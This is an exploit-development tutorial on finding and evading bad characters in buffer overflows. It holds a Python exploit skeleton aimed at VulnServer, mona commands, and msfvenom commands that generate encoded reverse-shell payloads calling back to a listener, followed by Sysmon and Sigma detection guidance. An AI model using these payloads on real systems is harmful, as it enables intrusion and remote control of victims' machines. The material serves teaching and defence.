Bad Characters, Null Bytes, and Restricted Character Sets

By Debraj Basak · Jun 20, 2026 · 11 min read · Exploit Development

Objective: Understand why certain bytes corrupt, truncate, or transform shellcode in stack-based buffer overflows, how to systematically enumerate a target’s restricted character set, and how to adapt encoding or instruction substitution to survive those constraints — alongside how defenders detect the resulting exploitation patterns.

Contents

1. What Are Bad Characters? The Concept Explained
2. Why \x00 Is Always the First Enemy
3. Common Bad Characters by Protocol and Context
4. Building and Sending the Test Byte Array
5. Inspecting Memory: Immunity Debugger and mona.py
6. Iterative Elimination: Narrowing the Bad List
7. Encoding Shellcode with msfvenom
8. Alphanumeric and Printable-Only Constraints
9. Instruction Substitution: Jumping Without Bad Opcodes
10. Unicode / Wide-Character Transformations
11. Common Attacker Techniques
12. Defensive Strategies & Detection
13. Tools for Bad-Character Analysis
14. MITRE ATT&CK Mapping
Summary

1. What Are Bad Characters? The Concept Explained

A bad character is any byte that causes the vulnerable application’s input-handling routine to misbehave: corrupting, truncating, or transforming the payload before it lands intact in the destination buffer. There is no universal set. The exact bad characters depend on the application’s parsing logic and the protocol in use.

Shellcode cannot contain bytes that the target gives special meaning, such as a newline, a delimiter, or a string terminator. The root cause is usually a string-handling function. C runtime (CRT) routines like strcpy, strncpy, strcat, and sprintf operate on null-terminated buffers and stop at the terminator, while the deprecated gets stops at a newline instead.

When you inspect memory after a crash, you are hunting for three distinct failure modes:

Missing bytes — characters stripped entirely by a sanitiser.
Altered bytes — characters transformed (e.g., \x80 appearing as \x01).
Premature termination — a byte that halts the copy, so nothing after it is written.

Identifying which bytes trigger these behaviors is a mandatory phase before any reliable shellcode can be placed.

Figure: Three distinct ways a bad character corrupts a payload before it ever reaches the destination memory region.
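The three failure modes can be told apart mechanically once you have the bytes you sent and the bytes you copied out of the debugger. The following is a minimal sketch, not a replacement for a debugger plugin; the function name `classify_first_failure` is hypothetical, and it assumes `observed` is exactly the slice of memory where the payload landed (if stale data follows a truncation point, it will be reported as an alteration instead).

```python
def classify_first_failure(sent: bytes, observed: bytes) -> str:
    """Label the first point where observed memory departs from what was sent."""
    for i, expected in enumerate(sent):
        if i >= len(observed):
            # Nothing was written from this byte onward.
            return f"truncated at 0x{expected:02x}"
        if observed[i] == expected:
            continue
        # If the next expected byte sits here, the current one was dropped.
        if i + 1 < len(sent) and observed[i] == sent[i + 1]:
            return f"missing 0x{expected:02x}"
        return f"altered 0x{expected:02x} -> 0x{observed[i]:02x}"
    return "intact"


sent = bytes(range(1, 8))
print(classify_first_failure(sent, b"\x01\x02\x04\x05\x06\x07"))  # missing 0x03
```

Only the first divergence is reported, which matches the rule that later corruption may just be a side effect of the first offender.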

2. Why `\x00` Is Always the First Enemy

The null byte (\x00) is always a bad character in string-based overflows. C-style string functions treat \x00 as the terminator, so any shellcode byte following a null is silently discarded.

Function	Behavior on `\x00`
`strcpy`	Stops copying at the first null
`strncpy`	Stops at null or `n` bytes
`strlen`	Returns length up to first null
`sprintf`	Stops consuming a `%s` argument at its first null
`gets`	Reads until newline or EOF; embedded nulls are stored, but later string calls stop at them

At the assembly level, strlen walks the buffer comparing each byte to zero and stops on a match, and strcpy applies the same test while copying, so the first zero byte defines the truncation boundary. This is built into how the Windows CRT and Win32 LPSTR / LPWSTR parameters represent strings: the terminator is the only length information they carry (a single zero byte for LPSTR, a 16-bit zero for LPWSTR).

Network contexts differ. A socket recv call reads up to a requested byte count and is binary-safe, so null bytes arrive from the wire in the buffer unchanged. So \x00 may survive transport but still die the moment the data hits a strcpy. Treat the string API and the socket as separate constraint layers.
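The two constraint layers can be modelled in a few lines. This is only a simulation under stated assumptions: `simulated_recv` and `simulated_strcpy` are hypothetical stand-ins that mimic the length-based and terminator-based behaviors, not calls into any real socket or CRT.

```python
def simulated_recv(wire: bytes, max_len: int) -> bytes:
    """Binary-safe read: returns up to max_len bytes, nulls included."""
    return wire[:max_len]


def simulated_strcpy(src: bytes) -> bytes:
    """C-string copy: everything up to, but not including, the first null."""
    return src.split(b"\x00", 1)[0]


wire = b"AAAA\x00BBBB"
received = simulated_recv(wire, 1024)
copied = simulated_strcpy(received)
print(len(received), len(copied))  # 9 4
```

All nine bytes cross the transport layer, but only the four before the null survive the string copy.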

3. Common Bad Characters by Protocol and Context

Restrictions come from three sources: protocol-specific rules (HTTP terminating on \x0D\x0A), application sanitisation (stripping nulls or high bytes), and encoding layers (Base64 or Unicode transformations).

Byte	Hex	Reason
Null	`\x00`	String terminator — always bad in string overflows
Line Feed	`\x0A`	Newline — terminates input in many protocol parsers
Carriage Return	`\x0D`	CR — terminates input lines (HTTP, SMTP, POP3)
Space	`\x20`	Whitespace delimiter — terminates tokens in some parsers
High byte (0xFF)	`\xFF`	Causes issues in some parsing contexts (for example, it is the Telnet IAC escape byte); note that form feed is `\x0C`, not `\xFF`

A web server vulnerable in its URI handler is the canonical restricted-set case: the legal URI character set is small, and non-printable or extended characters are rejected outright, narrowing or preventing exploitation. SMTP, POP3, and FTP argument parsers each impose their own delimiters.
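To see why delimiters matter, consider a toy request-line parser. This is a sketch under assumptions: `parse_request_line` is a hypothetical, deliberately naive parser, not the behavior of any particular server, but it shows how a space or CRLF inside the URI cuts the data short before any overflow can occur.

```python
def parse_request_line(raw: bytes) -> list[bytes]:
    """Take the first CRLF-terminated line and split it on single spaces."""
    line = raw.split(b"\r\n", 1)[0]
    return line.split(b" ")


clean = b"GET /AAAAAAAA HTTP/1.1\r\nHost: x\r\n\r\n"
dirty = b"GET /AAAA\x20BBBB\x0d\x0aCCCC HTTP/1.1\r\n\r\n"

print(parse_request_line(clean)[1])  # b'/AAAAAAAA'
print(parse_request_line(dirty)[1])  # b'/AAAA'
```

In the second request the parser hands only `/AAAA` to the URI handler: the embedded `\x20` ended the token and the embedded `\x0D\x0A` ended the line.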

4. Building and Sending the Test Byte Array

The standard methodology: generate every non-null byte (\x01–\xFF), place it after the EIP-overwrite offset, crash the target, and compare sent versus received in memory. Python builds the array cleanly:

# Generate \x01 through \xFF (255 bytes, null excluded)
badchar_test = bytearray(range(1, 256))

offset   = 2003                     # VulnServer TRUN EIP offset (illustrative)
buf      = b"A" * offset
buf     += b"B" * 4                 # EIP overwrite marker
buf     += bytes(badchar_test)      # byte array lands at ESP
buf     += b"C" * (3000 - len(buf)) # padding

You then deliver that buffer to the vulnerable service running under a debugger:

import socket

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("192.168.56.10", 9999))
s.recv(1024)
s.sendall(b"TRUN /.:/" + buf)       # VulnServer TRUN command; sendall keeps writing until the whole buffer is sent
s.close()

After the crash, the \x01–\xFF block should appear contiguously in memory, typically at or near ESP.

5. Inspecting Memory: Immunity Debugger and mona.py

In Immunity Debugger, follow ESP in the hex dump and use the mona plugin to diff what you sent against what landed.

!mona config -set workingfolder c:\mona\%p
!mona bytearray -cpb "\x00"
!mona compare -f c:\mona\vulnserver\bytearray.bin -a <ESP_address>

!mona config sets the output directory; %p expands to the name of the debugged process, so for a process named vulnserver the files land in c:\mona\vulnserver.
!mona bytearray -cpb "\x00" writes a reference bytearray.bin containing every byte value except the listed bad chars (here, \x01–\xFF).
!mona compare diffs the reference file against the live memory at the supplied ESP address and prints a per-byte verdict.

Abridged, illustrative mona output looks like:

[+] Comparing with memory at address 0x00ab1a30
    Only the first 9 bytes were identical
    Possibly bad chars: 0a 0d
[+] Bytes omitted from input: ...
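If mona is unavailable, the same "how many bytes matched" figure can be computed offline from a hex dump copied out of the debugger. The sketch below is an approximation of that one statistic, not a reimplementation of `!mona compare`; the helper name `identical_prefix_len` and the sample dump text are made up for illustration.

```python
def identical_prefix_len(reference: bytes, dumped: bytes) -> int:
    """Count how many leading bytes of the dump match the reference array."""
    n = 0
    for a, b in zip(reference, dumped):
        if a != b:
            break
        n += 1
    return n


reference = bytes(range(1, 256))
dump_text = "01 02 03 04 05 06 07 08 09 00 41 41"  # hypothetical bytes copied from the hex pane
dumped = bytes.fromhex(dump_text)

n = identical_prefix_len(reference, dumped)
suspect = reference[n] if n < len(reference) else None
print(n, hex(suspect))  # 9 0xa
```

The byte at index `n` of the reference is the first suspect; anything after it still needs to be retested once that byte is excluded.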

6. Iterative Elimination: Narrowing the Bad List

Mona flags where the sequence diverges. The critical nuance: only the first byte of a corrupted run is necessarily bad. Subsequent corruption is often a knock-on effect of that first offender shifting alignment.

If memory shows 11 12 13 15 with 14 missing, then \x14 is the only confirmed bad character at that step — not \x15 or anything after it. Add \x14 to your exclusion list, regenerate, and re-run:

BADCHARS = b"\x00\x0a\x0d"          # grows one confirmed byte per pass

full = bytearray(range(1, 256))
test = bytes(b for b in full if b not in BADCHARS)

# rebuild buffer with `test`, resend, re-inspect under the debugger

Repeat the send → inspect → eliminate cycle until the entire \x01–\xFF block (minus the confirmed bad bytes) appears intact at ESP. Mirror the same exclusion list in !mona bytearray -cpb "..." so the reference file matches.

Figure: Only the first byte of a corrupted run is confirmed bad; iterate the send-diff-eliminate loop until the full array survives intact in memory.
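The whole elimination loop can be rehearsed offline against a simulated filter before touching a debugger. Everything here is an assumption made for illustration: `fake_target` is a hypothetical stand-in for the debugged service (it truncates at `\x0a` and `\x0d` and silently drops `\x20`), and `enumerate_badchars` automates the manual resend-and-inspect cycle.

```python
def fake_target(data: bytes) -> bytes:
    """Stand-in for the debugged service: truncates at 0x0a/0x0d, drops 0x20."""
    out = bytearray()
    for b in data:
        if b in (0x0A, 0x0D):
            break
        if b == 0x20:
            continue
        out.append(b)
    return bytes(out)


def first_divergent_byte(sent: bytes, observed: bytes):
    """Return the first sent byte that did not land where expected, or None."""
    for i, expected in enumerate(sent):
        if i >= len(observed) or observed[i] != expected:
            return expected
    return None


def enumerate_badchars(target, known: bytes = b"\x00") -> bytes:
    """Add one confirmed bad byte per pass until the array survives intact."""
    bad = set(known)
    while True:
        test = bytes(b for b in range(1, 256) if b not in bad)
        culprit = first_divergent_byte(test, target(test))
        if culprit is None:
            return bytes(sorted(bad))
        bad.add(culprit)


print(enumerate_badchars(fake_target).hex(" "))  # 00 0a 0d 20
```

Each pass confirms exactly one byte, which is why three bad characters cost three resend cycles plus a final clean pass.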

7. Encoding Shellcode with msfvenom

Once the bad-char set is known, generate shellcode that avoids it. msfvenom’s -b flag specifies the forbidden bytes; it then picks an encoder (x86/shikata_ga_nai by default on x86) to re-encode around them.

msfvenom -p windows/shell_reverse_tcp LHOST=192.168.56.1 LPORT=443 \
  -b '\x00\x0a\x0d\x20' -e x86/shikata_ga_nai -f python

x86/shikata_ga_nai (ranked excellent) is a polymorphic XOR additive-feedback encoder. It reorders instructions and dynamically selects registers, producing different output each run and frustrating signature-based detection.

Size overhead is real. Encoding inflates the payload because a decoder stub is prepended: a 71-byte payload can grow to 98 bytes after one shikata_ga_nai pass. Account for buffer space accordingly.

Failure case: when the bad-char list is too restrictive, shikata_ga_nai may abort with "A valid opcode permutation could not be found". Fall back to an alternative encoder:

msfvenom -p windows/shell_reverse_tcp LHOST=192.168.56.1 LPORT=443 \
  -b '\x00\x0a\x0d\x20\xff' -e x86/call4_dword_xor -f python

x86/call4_dword_xor and x86/countdown use different decoder stubs that may satisfy tighter constraints.

Figure: msfvenom encoder selection is driven by the bad-char list; escalate through fallback encoders when the default cannot find a valid opcode permutation.
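Whatever encoder is used, it is worth verifying the output against the bad-char list rather than trusting it. A minimal sketch follows, assuming the list is written in the same `'\x00\x0a'` notation passed to `-b`; the helper names are hypothetical and the sample bytes are inert placeholders, not real shellcode.

```python
def parse_badchars(spec: str) -> bytes:
    """Turn a '\\x00\\x0a'-style string (as passed to -b) into raw bytes."""
    return bytes.fromhex(spec.replace("\\x", ""))


def find_bad_offsets(payload: bytes, badchars: bytes) -> list[tuple[int, int]]:
    """Return (offset, byte value) for every forbidden byte in the payload."""
    bad = set(badchars)
    return [(i, b) for i, b in enumerate(payload) if b in bad]


badchars = parse_badchars(r"\x00\x0a\x0d\x20")
sample = b"\x90\x90\x0a\x41\x20"  # placeholder bytes for illustration
print(find_bad_offsets(sample, badchars))  # [(2, 10), (4, 32)]
```

An empty list means the payload is clean for that set; any hit gives the exact offset to inspect.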

8. Alphanumeric and Printable-Only Constraints

When so many bytes are forbidden that standard encoders fail, switch to alphanumeric output. x86/alpha_mixed (msfvenom) and the standalone Alpha2 tool emit shellcode built from mixed-case letters and digits, a subset of the \x21–\x7E printable range, which is ideal when the target only passes printable URI characters.

msfvenom -p windows/shell_reverse_tcp LHOST=192.168.56.1 LPORT=443 \
  -e x86/alpha_mixed BufferRegister=ESP -f python

The BufferRegister option tells the decoder which register points to the start of the payload, removing the self-locating GetPC stub, whose bytes are not alphanumeric. The register must hold the payload’s exact address when the decoder starts running, or decoding fails. The trade-off is size: an alphanumeric payload can balloon to 710 bytes or more. When the available buffer cannot hold an inflated payload, stage a small egghunter to search memory for a larger second-stage payload placed elsewhere.
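Both constraints in this section, character class and size, are easy to check before sending anything. The sketch below uses hypothetical helper names and placeholder byte strings; it treats "alphanumeric" as ASCII letters and digits only, which is an assumption about what the target accepts.

```python
import string

ALNUM = set((string.ascii_letters + string.digits).encode("ascii"))


def non_alnum_offsets(payload: bytes) -> list[int]:
    """Offsets of bytes that fall outside 0-9, A-Z, a-z."""
    return [i for i, b in enumerate(payload) if b not in ALNUM]


def fits(payload: bytes, available: int) -> bool:
    """True if the payload fits in the space left in the buffer."""
    return len(payload) <= available


print(non_alnum_offsets(b"PYIIIIII"))      # []
print(non_alnum_offsets(b"PYII\x89\xe1"))  # [4, 5]
print(fits(b"A" * 710, 500))               # False
```

A non-empty offset list on encoder output usually points at a leftover non-alphanumeric stub, and a failed size check is the cue to consider staging.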

9. Instruction Substitution: Jumping Without Bad Opcodes

Sometimes the bad character lives in your jump opcode, not your shellcode body. The short JMP encodes as \xEB, a high byte (above \x7F) that some HTTP and other network-protocol targets reject or transform. When \xEB is in the bad-char set, the instruction cannot be used as-is.

Instruction	Opcode bytes	Notes
`JMP SHORT +6`	`\xEB \x06`	`\xEB` often restricted
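`JE / JNE` pair	`\x74 .. \x75 ..`	Complementary branches to the same target; exactly one is always taken
Near `JMP`	`\xE9 .. .. .. ..`	Alternative when `\xEB` is bad, but the 32-bit displacement adds `\x00` bytes for short forward jumps and `\xFF` bytes for short backward ones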

A bad-char-safe substitution uses a conditional pair that, regardless of the zero flag, always transfers control:

    ; JMP SHORT replacement using complementary conditionals
    je  short target     ; 74 xx    -> jump if ZF=1
    jne short target     ; 75 xx-2  -> jump if ZF=0 (starts 2 bytes later, so its displacement is 2 smaller)
    ; exactly one branch is always taken; no \xEB byte present
target:
    ; decoder / shellcode continues here

In SEH overwrites, the 4-byte nSEH field typically holds a JMP SHORT that hops over the adjacent handler pointer into the payload, so its opcode bytes must also dodge the bad-char set. Use mona or WinDbg to locate suitable jump equivalents and clean POP POP RET gadgets.
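The displacement arithmetic for the complementary pair is easy to get wrong by two, so a small calculator helps. This is a sketch limited to forward rel8 jumps; `je_jne_pair` is a hypothetical helper, and `distance` is assumed to be measured from the first byte of the pair to the target.

```python
def je_jne_pair(distance: int) -> bytes:
    """Encode 'je target; jne target' for a target `distance` bytes past the pair's start."""
    je_disp = distance - 2   # rel8 counts from the end of the 2-byte JE
    jne_disp = distance - 4  # and from the end of the 2-byte JNE that follows it
    if jne_disp < 0 or je_disp > 127:
        raise ValueError("this sketch handles forward rel8 jumps only")
    return bytes([0x74, je_disp, 0x75, jne_disp])


pair = je_jne_pair(8)  # same landing point as EB 06 placed at the same address
print(pair.hex(" "))   # 74 06 75 04
```

The displacement bytes are subject to the bad-char set too: a distance of 4 yields `74 02 75 00`, which reintroduces a null, so check the encoded pair rather than just the opcodes.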

10. Unicode / Wide-Character Transformations

A distinct constraint class: some applications convert input via MultiByteToWideChar() (Win32) or mbstowcs() (CRT), expanding each byte to a 16-bit wide character. For ASCII-range bytes this effectively inserts a null after every byte; bytes from \x80 upward are mapped through the active code page and may change value altogether. Either way it breaks shellcode alignment entirely: this is transformation, not stripping.

# You send:        \x41\x42
# Memory shows:    \x41\x00\x42\x00   <- a \x00 inserted after every byte
sent     = b"\x41\x42"
observed = b"\x41\x00\x42\x00"        # Unicode expansion in the debugger

A naive \x01–\xFF array will look catastrophically corrupted under this transformation because every byte appears null-padded. The classical workaround is Venetian shellcode: code constructed by hand so that the injected null bytes are absorbed as operands or harmless filler instructions, letting the real opcodes survive expansion. Identify these buffers by spotting the regular \x00 interleave in the hex dump.
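Spotting the interleave can be automated so it is not mistaken for ordinary corruption. The sketch below models only the ASCII-range case, where expansion is equivalent to UTF-16LE encoding; the function names are hypothetical, and high bytes are deliberately out of scope because their mapping depends on the code page.

```python
def expand_like_widechar(data: bytes) -> bytes:
    """Model ASCII-range wide-character expansion: each byte followed by 0x00."""
    return b"".join(bytes([b, 0]) for b in data)


def looks_expanded(sent: bytes, observed: bytes) -> bool:
    """True if memory begins with the null-interleaved form of what was sent."""
    expected = expand_like_widechar(sent)
    return observed[:len(expected)] == expected


sent = b"\x41\x42"
print(expand_like_widechar(sent) == "AB".encode("utf-16-le"))  # True
print(looks_expanded(sent, b"\x41\x00\x42\x00\xcc\xcc"))       # True
print(looks_expanded(sent, b"\x41\x42\xcc\xcc"))               # False
```

When this check passes, ordinary bad-character elimination is the wrong tool: the buffer is being transformed as a whole.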

11. Common Attacker Techniques

Technique	Description
Bad-char enumeration	Inject `\x01`–`\xFF`, diff memory, identify forbidden bytes
Shellcode encoding	Re-encode with `shikata_ga_nai` / `call4_dword_xor` to avoid bad bytes
Alphanumeric shellcode	`alpha_mixed` / Alpha2 for printable-only constraints
Jump substitution	Replace `\xEB` with `JE/JNE` pairs or near `JMP`
Venetian shellcode	Survive Unicode expansion in wide-character buffers
Egghunter staging	Small finder stub locating a larger payload in tight buffers

These are pre-exploitation tradecraft — they enable shellcode delivery but execution and payload behavior are what generate detectable telemetry.

12. Defensive Strategies & Detection

Bad-char testing itself is quiet, but the encoded shellcode it produces is loud once it executes from unbacked memory.

Event ID	Name	Relevance
`1`	Process Creation	Frameworks (Metasploit, Empire) launching payloads
`3`	Network Connection	Outbound C2 from an exploited process
`8`	CreateRemoteThread	Post-exploitation thread injection
`10`	ProcessAccess	Cross-process open by injected payload
`11`	FileCreate	Shellcode or payload dropped to disk

Sysmon Event ID 10 (ProcessAccess) is the primary signal. Shellcode executing from anonymous stack or heap memory produces a CallTrace containing UNKNOWN frames — code with no backing image on disk.

title: Shellcode Injection via Suspicious Process Access
logsource:
  category: process_access
  product: windows
detection:
  selection:
    EventID: 10
    GrantedAccess:
      - '0x147a'
      - '0x1f3fff'
    CallTrace|contains: 'UNKNOWN'
  condition: selection
level: high
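The rule's matching logic reads as "all three fields must match, and GrantedAccess may be either listed value". The sketch below expresses that logic in Python for testing against exported events. It is not a Sigma engine: `matches_rule` is a hypothetical helper, the sample events are invented for illustration, and the comparison is case-insensitive on the assumption that it mirrors Sigma's default string matching.

```python
SUSPICIOUS_ACCESS = {"0x147a", "0x1f3fff"}


def matches_rule(event: dict) -> bool:
    """Fields are ANDed together; the GrantedAccess list is ORed."""
    access = str(event.get("GrantedAccess", "")).lower()
    trace = str(event.get("CallTrace", "")).upper()
    return (
        event.get("EventID") == 10
        and access in SUSPICIOUS_ACCESS
        and "UNKNOWN" in trace
    )


# Hypothetical events, shaped like parsed Sysmon ProcessAccess records.
injected = {
    "EventID": 10,
    "GrantedAccess": "0x1F3FFF",
    "CallTrace": r"C:\Windows\SYSTEM32\ntdll.dll+9d4c4|UNKNOWN(0000020A1B2C0000)",
}
backed = dict(injected, CallTrace=r"C:\Windows\SYSTEM32\ntdll.dll+9d4c4")

print(matches_rule(injected), matches_rule(backed))  # True False
```

The second event differs only in having a fully image-backed call trace, which is exactly the distinction the rule relies on.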

Additional telemetry and hardening:

ETW — subscribe to Microsoft-Windows-Threat-Intelligence (ETWTI) to observe injection and memory manipulation; Microsoft-Windows-Security-Auditing for process audit events.
Audit Process Creation (Detailed Tracking) → Security Event 4688 with command-line logging captures framework invocations.
WAF / network — flag URI patterns carrying buffer-overflow payloads; a burst of access-violation or segfault alerts in a short window signals active exploitation attempts.
Compiler mitigations — /GS, /SAFESEH, /DYNAMICBASE, /NXCOMPAT raise the exploitation bar.
Input validation — allowlist legal characters at the boundary; explicitly reject \x00, \x0A, \x0D.
WDEG — enforce DEP and CFG per-process via Set-ProcessMitigation.
Memory integrity — flag executable pages not backed by a known on-disk image.
Deploy Sysmon with a community baseline (SwiftOnSecurity, olafhartong sysmon-modular) to ensure EID 10 captures CallTrace.

Figure: Defence-in-depth layers each intercept exploitation at a different stage; encoded shellcode evades transport filters but generates unmistakable runtime telemetry.
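The input-validation item above is the cheapest layer to implement. A minimal allowlist sketch follows; the permitted character set and the 256-byte limit are assumptions chosen for illustration and would need to match what the real field legitimately carries.

```python
import string

# Assumed policy: letters, digits, and a few URI-safe punctuation characters.
ALLOWED = set((string.ascii_letters + string.digits + "-._~/").encode("ascii"))
MAX_LEN = 256  # assumed upper bound for this field


def validate_field(value: bytes) -> bool:
    """Accept only short inputs made entirely of allowlisted bytes."""
    return len(value) <= MAX_LEN and all(b in ALLOWED for b in value)


print(validate_field(b"/index.html"))       # True
print(validate_field(b"/a\x00b"))           # False
print(validate_field(b"/a\r\nHost: evil"))  # False
print(validate_field(b"A" * 3000))          # False
```

Because the check is an allowlist, \x00, \x0A, \x0D and every high byte are rejected without being listed individually, and the length bound stops oversized input before it reaches any copy routine.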

13. Tools for Bad-Character Analysis

Tool	Description	Link
Immunity Debugger	Crash analysis, ESP dump inspection	immunityinc.com
mona.py	Bytearray generation and memory comparison	github.com/corelan
WinDbg	Opcode/gadget inspection, memory diffing	microsoft.com
msfvenom	Shellcode generation and encoding (`-b`)	metasploit.com
Alpha2	Standalone alphanumeric shellcode encoder	github.com
x64dbg	User-mode debugging and patching	x64dbg.com
Ghidra	Static opcode/disassembly analysis	ghidra-sre.org
Volatility	Memory forensics, unbacked code regions	volatilityfoundation.org

14. MITRE ATT&CK Mapping

Bad-char testing and shellcode crafting are pre-exploitation tradecraft with no standalone technique ID — they enable the techniques below.

Technique	MITRE ID	Detection
Exploitation for Client Execution	`T1203`	Process crash bursts, EID `1` framework launches
Exploit Public-Facing Application	`T1190`	WAF anomalies, service access violations
Exploitation for Privilege Escalation	`T1068`	Local overflow → elevated process behavior
Obfuscated Files or Information	`T1027`	Encoder signatures (shikata/alpha) on disk/wire
Process Injection	`T1055`	Sysmon EID `8`/`10`, `UNKNOWN` in `CallTrace`

Summary

Bad characters are application-defined bytes that corrupt, truncate, or transform shellcode before it lands intact in memory; enumerate them empirically, never assume.
\x00 is always bad in string-based overflows because CRT functions like strcpy and strlen treat it as the terminator; sockets pass it but downstream string APIs still die on it.
Enumerate with a \x01–\xFF byte array, diff memory using !mona compare, and remember only the first byte of a corrupted run is confirmed bad.
Adapt with msfvenom -b encoding (shikata_ga_nai, falling back to call4_dword_xor or alpha_mixed), jump-opcode substitution, and Venetian shellcode for Unicode buffers.
Detect the resulting payloads via Sysmon Event ID 10 with UNKNOWN CallTrace frames, ETWTI injection telemetry, and process-creation auditing (4688).

